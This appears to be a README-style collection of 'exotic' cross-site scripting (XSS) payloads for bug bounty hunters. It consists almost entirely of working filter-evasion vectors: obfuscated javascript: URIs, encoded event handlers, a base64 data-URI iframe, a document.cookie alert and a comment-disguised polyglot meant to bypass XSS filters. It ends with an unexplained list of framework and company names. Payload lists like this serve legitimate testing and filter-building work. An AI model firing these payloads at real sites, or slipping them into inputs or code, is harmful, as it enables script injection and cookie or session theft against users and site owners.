Exotic and uncommon XSS Vectors to hit the target as quickly as possible. THIS IS SPECIALLY FOR BUG BOUNTY HUNTERS AND SECURITY RESEARCHERS.
I REQUEST TO CONTRIBUTE TO THE PROJECT BY INCLUDING ONLY HIGHLY EXOTIC XSS VECTORS.
“><svg/onload=alert(document.domain)>”@x.y
<svg onload="alert(1)" <="" svg=""
<</p>iframe src=javascript:alert()//
<iframe/src=j%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0t:prompt `1`>
%22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--
„> <img src = x onerror = javascript: alert (1); …
onerror%3Deval%3Bthrow'%3Dalert%5Cx281%5Cx29'%3B
<iframe %00 src="	javascript:prompt(1)	"%00>
<input/onmouseover="javaSCRIPT:confirm(1)"
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>
'
<--`<img/src=` onerror=alert(1)> --!>
'';!--\"<XSS>=&{()}
¼script¾alert(¢XSS¢)¼/script¾
“><s”%2b”cript>alert(document.cookie)</script>
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
a=\"get\";
b=\"URL(\\"\";
c=\"javascript:\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<svg•onload=alert(1)>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //># //This payload is used to fool and bypass advanced xss filters by fooling as if it is comments.
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent